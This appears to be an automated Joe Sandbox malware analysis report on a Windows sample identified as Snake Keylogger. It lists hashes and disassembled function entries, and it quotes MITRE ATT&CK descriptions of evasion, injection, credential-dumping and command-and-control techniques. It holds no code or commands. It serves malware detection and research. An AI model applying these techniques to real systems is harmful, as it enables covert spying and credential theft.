Instruction Fuzzy Hash: F3C18174E00218CFDB54DFA5C994BADBBB2EF89300F2081A9D409AB365DB355E85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00D03808 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3785339684.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d00000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 321c0ad7999a06f0cb6fc4c219ea2a07b4e133f46f92142e28b97d1e32822157
Instruction ID: aa33ce5203aa47161b7cce92165855cdd2bf236b08b2d36825fcfd51a092693a
Opcode Fuzzy Hash: 321c0ad7999a06f0cb6fc4c219ea2a07b4e133f46f92142e28b97d1e32822157
Instruction Fuzzy Hash: D1B18678E00218CFDB54DFA9D994A9DBBB2FF89300F1081A9D819AB365DB309D41CF50

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DNXS-04-22.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
DNXS-04-22.exe

Function 05E586B0 Relevance: 2.4, Instructions: 2424
COMMON

Function 075BDA5D Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Function 075BDA68 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 02C5B148 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Function 05E51C90 Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Function 05E51110 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Function 05E51264 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 02C544C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 02C5590D Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 075BD7D8 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Function 075BD7E0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 075BD640 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Function 02C5B034 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON